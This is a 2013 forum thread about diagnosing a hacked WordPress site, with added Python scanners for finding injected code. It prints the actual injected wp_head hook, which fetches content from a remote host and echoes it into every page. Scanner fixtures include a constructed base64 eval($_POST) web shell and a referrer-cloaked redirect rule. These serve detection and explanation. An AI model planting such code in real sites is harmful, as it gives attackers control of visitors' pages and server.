
How to check if my site got SQL injected/hacked?

Discussion in 'Black Hat SEO' started by Russian-Czar, May 13, 2013.

  1. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Sometimes (rarely) when I go to my domain it redirects to a parked domain; when I retry it works fine. It happens rarely, about 20 to 1. Not sure if it's my computer or the site.



    How to check if my site got SQL injected or hacked some other way?
     
    • Thanks Thanks x 1
  2. cody41

    cody41 Power Member

    Joined:
    Jun 18, 2009
    Messages:
    682
    Likes Received:
    274
    Location:
    Texas
    If you're running a PHP-based site, go ahead and search your theme or site code for base64 that shouldn't be there. That might be a good start.
     
    • Thanks Thanks x 1
  3. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Thanks for the reply. Not sure how to do that, I will google it, but if you could explain: are you talking about the .php files or the SQL database?
     
  4. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Found the base64 in my PHP files

    Code:
    Timthumb.php  -  51.691 bytes  -  Sat, 12.01.13 at 21:43  -  \wp-content\Themes\THEME\
    13.502    // base64 encoded red image that says 'no hotlinkers'
    13.602    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
     class-feed.php  -  3.684 bytes  -  Thu, 22.11.12 at 00:23  -  \wp-includes\
    3.271    if ( $type & SIMPLEPIE_CONSTRUCT_BASE64 ) {
    3.293    $data = base64_decode( $data );
    
    
     class-http.php  -  58.772 bytes  -  Fri, 25.01.13 at 17:17  -  \wp-includes\
    46.547    return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
     class-IXR.php  -  31.675 bytes  -  Wed, 15.08.12 at 14:12  -  \wp-includes\
    2.970    // Deal with IXR object types base64 and date
    3.155    if (is_object($this->data) && is_a($this->data, 'IXR_Base64')) {
    3.187    return 'base64';
    5.016    case 'base64':
    10.042    case 'base64':
    10.076    $value = base64_decode($this->_currentTagContents);
    25.459    * IXR_Base64
    25.513    class IXR_Base64
    25.555    function IXR_Base64($data)
    25.656    return '<base64>'.base64_encode($this->data).'</base64>';
    25.665    return '<base64>'.base64_encode($this->data).'</base64>';
    25.695    return '<base64>'.base64_encode($this->data).'</base64>';
    28.484    case 'base64':
    30.447    case 'base64':
    30.496    $return[] = new IXR_Base64('base64');
    30.504    $return[] = new IXR_Base64('base64');
     class-phpmailer.php  -  81.728 bytes  -  Mon, 25.06.12 at 21:54  -  \wp-includes\
    2.745    *  "8bit", "7bit", "binary", "base64", and "quoted-printable".
    48.985    public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    52.434    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    52.612    protected function EncodeFile($path, $encoding = 'base64') {
    53.774    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    53.924    public function EncodeString($str, $encoding = 'base64') {
    54.002    case 'base64':
    54.042    $encoded = chunk_split(base64_encode($str), 76, $this->LE);
    56.065    $encoded = $this->Base64EncodeWrapMB($str);
    56.125    $encoded = base64_encode($str);
    57.424    public function Base64EncodeWrapMB($str) {
    57.774    // Base64 has a 4:3 ratio
    58.062    $chunk = base64_encode($chunk);
    63.363    public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') {
    64.373    public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    64.986    public function AddStringEmbeddedImage($string, $cid, $filename = '', $encoding = 'base64', $type = 'application/octet-stream') {
    71.060    if ( $this->AddEmbeddedImage($basedir.$directory.$filename, md5($filename), $filename, 'base64', $mimeType) ) {
    77.921    return base64_encode($signature);
    80.309    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
    80.353    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
     class-simplepie.php  -  90.453 bytes  -  Mon, 05.11.12 at 07:25  -  \wp-includes\
    7.558    * base64-encoded construct
    7.615    define('SIMPLEPIE_CONSTRUCT_BASE64', 8);
     class-smtp.php  -  24.618 bytes  -  Tue, 07.02.12 at 09:13  -  \wp-includes\
    7.639    fputs($this->smtp_conn, base64_encode($username) . $this->CRLF);
    8.154    fputs($this->smtp_conn, base64_encode($password) . $this->CRLF);
     class-snoopy.php  -  37.774 bytes  -  Wed, 27.10.10 at 03:54  - \wp-includes\
    25.678    $headers .= "Authorization: Basic ".base64_encode($this->user.":".$this->pass)."\r\n";
    25.841    $headers .= 'Proxy-Authorization: ' . 'Basic ' . base64_encode($this->proxy_user . ':' . $this->proxy_pass)."\r\n";
    30.573    $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass);
     File.php  -  9.678 bytes  -  Wed, 21.11.12 at 15:31  - \wp-includes\SimplePie\
    6.807    $out .= "Authorization: Basic " . base64_encode("$url_parts[user]:$url_parts[pass]") . "\r\n";
    
    
     Misc.php  -  51.559 bytes  -  Wed, 21.11.12 at 15:31  -  \wp-includes\SimplePie\
    40.331    if (isset($attribs['']['mode']) && strtolower(trim($attribs['']['mode']) === 'base64'))
    40.376    $mode = SIMPLEPIE_CONSTRUCT_BASE64;
    41.903    return SIMPLEPIE_CONSTRUCT_BASE64;
     Sanitize.php  -  15.703 bytes  -  Sun, 02.12.12 at 09:43  - \wp-includes\SimplePie\
    7.019    if ($type & SIMPLEPIE_CONSTRUCT_BASE64)
    7.044    $data = base64_decode($data);
     
  5. accelerator_dd

    accelerator_dd Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2010
    Messages:
    2,441
    Likes Received:
    1,005
    Occupation:
    SEO
    Location:
    IM Wonderland
    You need to post the actual base64 dumps, such as:
    R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=
    which is the only code you posted, and it is just an image from what I saw (red background, nothing else in there).

    You have a listing of all the places base64 is mentioned, trace those in the files and see what they are encoding/decoding, then post those values if you need help and we can try to see what the issue is.
     
    • Thanks Thanks x 1
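The advice in the two posts above (grep the theme for base64, then decode what you find and see what it actually is) can be done in one pass. The following is an added example, not code from the thread: a Python scanner that pulls long base64 literals out of PHP files, decodes them, and labels each by what it decodes to, so the GIF that timthumb.php carries is recognised as an image while a literal that decodes to PHP source, or an eval(base64_decode(...)) chain, is flagged. The sample directory it builds is constructed, and the planted eval(base64_decode(...)) backdoor is hypothetical, not something found on the poster's site.

```python
from __future__ import annotations

import base64
import binascii
import os
import re
import tempfile

# A quoted run of base64 alphabet of at least 40 characters. The class also admits
# the literal "\n" escapes and whitespace seen in the timthumb listing above, and
# the length floor keeps short tokens such as the string 'base64' in a switch out.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/\\n\s]{40,}={0,2})["\']')

# "decode, then execute" chains are the usual shape of an injected PHP backdoor.
DECODE_AND_EXEC = re.compile(
    r"\b(eval|assert|create_function)\s*\(\s*"
    r"(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
)

# Magic bytes of blobs that are almost always harmless inside theme code.
IMAGE_MAGIC = {
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
}

# Decoded bytes that look like PHP, or that read request input, are the real find.
PHP_CODE = re.compile(rb"<\?php|\beval\s*\(|\$_(?:GET|POST|REQUEST|COOKIE)\b")


def decode_literal(literal: str) -> bytes | None:
    """Decode a base64 literal the way PHP would see it; None if it is not base64."""
    cleaned = re.sub(r"\\n|\s", "", literal)  # drop "\n" escapes and line wrapping
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(blob: bytes) -> str:
    """Label decoded bytes: an image is expected in a theme, PHP source is not."""
    for magic, kind in IMAGE_MAGIC.items():
        if blob.startswith(magic):
            return kind
    if PHP_CODE.search(blob):
        return "php-code"
    return "unknown"


def scan_text(text: str) -> list[tuple[str, str]]:
    """Return (verdict, evidence) pairs for the contents of one PHP file."""
    findings = [("decode-and-exec", m.group(0)) for m in DECODE_AND_EXEC.finditer(text)]
    for m in B64_LITERAL.finditer(text):
        blob = decode_literal(m.group(1))
        if blob is not None:
            findings.append((classify(blob), m.group(1)[:24] + "..."))
    return findings


def scan_tree(root: str, exts: tuple[str, ...] = (".php",)) -> dict[str, list[tuple[str, str]]]:
    """Walk a theme or plugin directory and report every file with findings."""
    report: dict[str, list[tuple[str, str]]] = {}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


# The GIF literal timthumb.php ships, exactly as quoted in the thread.
TIMTHUMB_GIF = (
    "R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\\n"
    "OGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\\n"
    "DULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs="
)


def build_sample_tree() -> str:
    """Constructed sample: a clean timthumb-style file plus one planted backdoor."""
    root = tempfile.mkdtemp(prefix="theme-")
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "timthumb.php"), "w") as fh:
        fh.write('<?php\n$imgData = base64_decode("%s");\n' % TIMTHUMB_GIF)
    # Hypothetical backdoor: eval of a base64 blob that is itself PHP reading $_POST.
    shell = base64.b64encode(b"<?php if (isset($_POST['c'])) { eval($_POST['c']); } ?>").decode()
    with open(os.path.join(root, "inc", "functions.php"), "w") as fh:
        fh.write('<?php\neval(base64_decode("%s"));\n' % shell)
    return root


if __name__ == "__main__":
    for path, found in scan_tree(build_sample_tree()).items():
        for verdict, evidence in found:
            print(f"{path}: {verdict}  {evidence}")
```

Point scan_tree at wp-content/themes and wp-content/plugins. Anything labelled php-code or decode-and-exec deserves a look; image/* hits like the timthumb one are noise. A literal that comes back "unknown" is worth chasing only if the surrounding code feeds it to eval, include, or a preg_replace with the /e modifier.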
  6. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I checked the files and I don't see any base64 dumps. The only code is "R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=" (the one you say is harmful). The rest of the files just use the keyword "base64".


    I have also installed a plugin that checks if the site is hacked or not, and got this:

     
  7. twistedtrick

    twistedtrick Power Member

    Joined:
    Aug 21, 2009
    Messages:
    654
    Likes Received:
    376
    Location:
    United States
    I would check the backlinks for the parked domain in popular backlink checking tools, and see if your domain is seen as a backlink to it via redirect.
     
    • Thanks Thanks x 1
  8. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I guess it was hacked; I found this in the source code:



     
  9. jr_sci

    jr_sci Senior Member

    Joined:
    Jan 30, 2010
    Messages:
    857
    Likes Received:
    686
    Occupation:
    CTO at Tiny Piglet Publishing, Bestselling Author
    Get a penetration expert. He will charge you less than $100 to do the testing.
     
  10. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I think I found it. Could someone confirm that this is hack/infected code?

    Code:
    <?php
    // Hooked into every page's <head>: fetches whatever http://www.jqury.net/?1
    // returns on this request and prints it verbatim into the page.
    function wp__head() {
        if (function_exists('curl_init')) {
            $url = "http://www.jqury.net/?1";
            $ch = curl_init();
            $timeout = 10;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);              // hand the body back instead of printing it directly
            curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); // tells the remote server which site is calling
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo "$data";                                             // remote-controlled HTML/JS lands in <head>
        }
    }
    add_action('wp_head', 'wp__head');
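The snippet above fetches http://www.jqury.net/?1 on every page load and echoes the response into <head>, so whatever that server returns for a given request ends up in the page; a remote server that answers differently from one request to the next would explain a redirect that only fires sometimes. As an added example, not code from the thread, the Python below audits a functions.php for exactly this shape: a function hooked to wp_head or wp_footer that both contacts a remote host and prints into the response. The sample file is constructed; it holds one ordinary hook plus the posted wp__head() verbatim.

```python
from __future__ import annotations

import re

# Hooks that run on every front-end page; a function registered here decides
# what goes into <head>/<footer> for every visitor.
HOOK = re.compile(r"""add_action\s*\(\s*['"](wp_head|wp_footer|init)['"]\s*,\s*['"](\w+)['"]""")
# Anything that pulls content from another server at request time.
REMOTE_FETCH = re.compile(
    r"\b(curl_init|curl_exec|file_get_contents|fopen|fsockopen|wp_remote_get|wp_remote_retrieve_body)\s*\("
)
# Anything that writes into the response.
OUTPUT = re.compile(r"\b(echo|print|printf)\b")
URL = re.compile(r"""https?://[^\s'"]+""")


def function_body(src: str, name: str) -> str | None:
    """Return the source of `function name(...) { ... }` by brace matching.
    Braces inside string literals are not special-cased; adequate for an audit pass."""
    m = re.search(r"function\s+%s\s*\([^)]*\)\s*\{" % re.escape(name), src)
    if m is None:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.start():i] if depth == 0 else None


def audit_hooks(src: str) -> list[dict]:
    """One record per hooked function: what it fetches and whether it echoes it."""
    findings = []
    for hook, fn in HOOK.findall(src):
        body = function_body(src, fn)
        if body is None:
            findings.append({"hook": hook, "function": fn, "verdict": "body-not-found", "urls": []})
            continue
        fetches = REMOTE_FETCH.search(body) is not None
        outputs = OUTPUT.search(body) is not None
        if fetches and outputs:
            verdict = "remote-content-injection"  # prints whatever another host returns
        elif fetches:
            verdict = "remote-fetch"              # phones home; worth reading
        else:
            verdict = "ok"
        findings.append({"hook": hook, "function": fn, "verdict": verdict, "urls": URL.findall(body)})
    return findings


# Constructed functions.php: one legitimate hook, plus the injected wp__head()
# exactly as posted in the thread.
SAMPLE_FUNCTIONS_PHP = r"""<?php
function theme_meta() {
    echo '<meta name="generator" content="example-theme">';
}
add_action('wp_head', 'theme_meta');

function wp__head() {
 if(function_exists('curl_init'))
 {
  $url = "http://www.jqury.net/?1";
  $ch = curl_init();
  $timeout = 10;
  curl_setopt($ch,CURLOPT_URL,$url);
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  $data = curl_exec($ch);
  curl_close($ch);
  echo "$data";
 }
}
add_action('wp_head', 'wp__head');
"""

if __name__ == "__main__":
    for f in audit_hooks(SAMPLE_FUNCTIONS_PHP):
        print(f"{f['hook']:9} {f['function']:12} {f['verdict']:26} {' '.join(f['urls'])}")
```

Run it over every functions.php under wp-content/themes and every plugin entry file; a "remote-content-injection" hit names both the hook and the host being contacted, which is also the host to look up when checking who else links to or is redirected through it.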
     
  11. serigoramos

    serigoramos Newbie

    Joined:
    Mar 13, 2013
    Messages:
    8
    Likes Received:
    0
    Occupation:
    tyguain
    Location:
    tyguain
    I think yours is a pirated WP theme... and yes, your site was hacked.
     
  12. healzer

    healzer Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Jun 26, 2011
    Messages:
    2,364
    Likes Received:
    1,967
    Gender:
    Male
    Occupation:
    Marketing automation tools
    Location:
    Somewhere in Europe
    Zdarova,

    W3Shield can help you out with this problem, if you are looking for a website scan or penetration test, let me know and we'll get everything ready for you!

    Have a great day!

    Cheers
    healzer
     
  13. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,066
    Likes Received:
    2,872
    Gender:
    Male
    Check your htaccess too...
     
  14. isnotcomplete

    isnotcomplete Newbie

    Joined:
    Apr 23, 2013
    Messages:
    42
    Likes Received:
    27
    Just throwing this out there, but if you paste fb9735872 into Google, look at the first link.
    I happened to download it myself as well. Works great and all, but I had to get rid of that pesky redirect.

    Also, why don't you go on over to that jqury site, with the ?1 and all, then view source.

    :)

    Last edit: OK, OK, I'll divulge the info. Don't download UberMenu from that other BH site.
    He edited one of the JS files to do that. Pretty nifty if I do say so myself, but he is definitely doing it wrong lol.
     
    Last edited: May 16, 2013
  15. LatteGrande

    LatteGrande Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 19, 2011
    Messages:
    1,957
    Likes Received:
    502
    Location:
    404 Not Found
    Mine got injected too! WTF! Have you found any solution to get them removed yet? Or can anyone help?
     
  16. garthor

    garthor Newbie

    Joined:
    Mar 24, 2013
    Messages:
    48
    Likes Received:
    13
    I don't believe your website was actually hacked... although I don't know what platform you are running or anything, I guess you are running a WordPress website. As far as I can tell from your reply, your website has some hidden HTML linking to other websites; most likely it's from a nulled WordPress theme or plugin. Even some "reputable" plugins insert hidden links in your website. You can try changing your theme and/or disabling your plugins.

    I believe it's the same case scenario for the OP as well...

    Also make sure to take a look at your .htaccess file as there could be a redirect somewhere to another domain.
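Gogol and garthor both point at .htaccess. As an added example, not from the thread, this Python audit flags the things worth reading for there: Redirect/RewriteRule targets on a host other than your own, together with any RewriteCond lines in front of them (a rule keyed on HTTP_REFERER or HTTP_USER_AGENT only fires for some visitors, which is one way a redirect can look intermittent to the site owner), and php_value auto_prepend_file, which makes PHP include a file before every script. The sample .htaccess and the hostnames example.com and parked-example.invalid are constructed.

```python
from __future__ import annotations

import re
from urllib.parse import urlparse

REDIRECT_DIRECTIVES = {"redirect", "redirectmatch", "redirectpermanent", "redirecttemp"}
PREPEND_SETTINGS = {"auto_prepend_file", "auto_append_file"}
SERVER_VAR = re.compile(r"%\{([A-Z_]+)\}")  # %{HTTP_REFERER} etc. inside a RewriteCond


def same_site(host: str, site_host: str) -> bool:
    return host == site_host or host.endswith("." + site_host)


def target_host(token: str) -> str | None:
    """Hostname of an absolute-URL rewrite/redirect target, else None (local path)."""
    return urlparse(token).hostname if "://" in token else None


def audit_htaccess(text: str, site_host: str) -> list[dict]:
    """Flag off-site redirects (with the conditions gating them) and prepend-file tricks."""
    findings: list[dict] = []
    pending: list[str] = []  # RewriteCond lines apply only to the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending.append(line)
            continue
        conds, pending = pending, []  # any other directive ends the condition chain
        if directive == "rewriterule" and len(parts) >= 3:
            kind, target = "external-rewrite", parts[2]
        elif directive in REDIRECT_DIRECTIVES and len(parts) >= 3:
            kind, target, conds = "external-redirect", parts[-1], []
        elif directive in ("php_value", "php_flag") and len(parts) >= 3 and parts[1].lower() in PREPEND_SETTINGS:
            findings.append({"line": lineno, "kind": "prepend-file", "host": None,
                             "target": parts[2], "conditions": []})
            continue
        else:
            continue
        host = target_host(target)
        if host is None or same_site(host, site_host):
            continue
        findings.append({
            "line": lineno, "kind": kind, "host": host, "target": target,
            "conditions": [v for c in conds for v in SERVER_VAR.findall(c)],
        })
    return findings


# Constructed sample: the standard WordPress block, then a cloaked off-site
# redirect that only triggers for search-engine referrals, then a harmless
# same-site redirect.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# constructed: cloaked redirect, fires only for search-engine referrals
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://parked-example.invalid/?ref=$1 [R=302,L]
Redirect 301 /old-page http://example.com/new-page
"""

if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS, "example.com"):
        gate = ", ".join(f["conditions"]) or "unconditional"
        print(f"line {f['line']}: {f['kind']} -> {f['target']} ({gate})")
```

The standard WordPress block passes clean because its only rule targets a local path. Check every .htaccess in the web root and its subdirectories, not just the top one, and read the conditions on any flagged rule: a redirect gated on the referrer is exactly the kind an owner who types the URL directly will rarely see.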